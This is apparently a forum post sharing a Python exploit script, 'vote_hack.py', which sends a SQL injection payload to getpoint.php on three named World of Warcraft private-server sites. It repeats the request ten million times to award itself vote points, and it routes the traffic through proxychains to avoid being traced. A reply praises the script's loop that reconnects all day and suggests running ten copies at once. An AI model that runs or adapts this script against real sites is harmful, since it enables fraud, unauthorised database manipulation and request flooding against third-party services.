Code:
#!python
#coding by DarkInjection And Post_Mortem Crew
#from friends to friends
#anyway this program just use a request that i have found in the site : eternion-wow.com
#u can call it "bug" in our case getpoint.php this!!!!
#so lets get the advantage of this bug and exploit the points:)
#i hope this will be keept.... private.....
#start....
#btw this program its used to be run under linux cos u need a program called proxychains example: proxychains python vote_hack.py
#posible can work in windows to.....
from socket import *
from time import sleep
port = 80
#new way faster voting
request_pt1 = "/getpoint.php?url=leet'+or+1='1+--&char=" #b sql inj condition = true
request_pt2 = '&sn=1234809692227'
print('[-]getpoint.php Vote Points Exploit By DarkInjection')
print('[-]Usage Its Simple Just Give The Name To Add Some Points And Thats It')
print('[-]Current Exploitable Realms :')
print('\t*-->eternion-wow id[1]')
print('\t*-->WoW-Wal id[2]')
print('\t*-->wowolympc.com id[3]')
name = raw_input('[*]Enter The Name To Vote Exploit: ')
realm = raw_input('[*]Enter The Realm Id To Vote Exploit: ')
if(len(name) > 0):
print('[-]Name : '+name)
else:
print('Name Its Empty??WTF....')
exit(1)
if(int(realm) == int(1)):
target = 'www.eternion-wow.com'
if(int(realm) == int(2)):
target = 'www.wowwal.com'
if(int(realm) == int(3)):
target = 'www.wowolympc.com'
#basic browser request
server_request ='GET '
server_request +=request_pt1
server_request +=name
server_request +=request_pt2
server_request +=' HTTP/1.1\r\n'
server_request +='Host: '+target+'\r\n'
server_request +='User-Agent: Mozilla/5.0\r\n'
server_request +='Keep-Alive: 300\r\n'
server_request +='Connection: Keep-Alive\r\n\r\n'
#server_request +='Cookie: PHPSESSID=b98fd4a3e307a1f63c71d02cb5dfbfe3; TIMEA=1234809690; TYPEA=94.71.240.1901\r\n\r\n' we dont need the cookie
#since **** up everything
count = 10000000#times to send votes to take:P
print('[*]Requesting The Server !')
for i in range(0,int(count)):
try:
i = socket(AF_INET,SOCK_STREAM)
except:
print('[/]Error In SOcket Function')
try:
i.connect((target,int(port)))
except:
print('[/]Error In Connect()')
try:
i.send(server_request)
print('[*]Request.....')
print(i.recv(10000))
except:
print('[/]Error In Send()')
this is better, it reconnects and doesnt just stop and shutdown, just activate it and itll run the whole day, always reconnecting lol.
whth this u can use like 10 a time, making 100 vp's/minute
greez, Sondermüll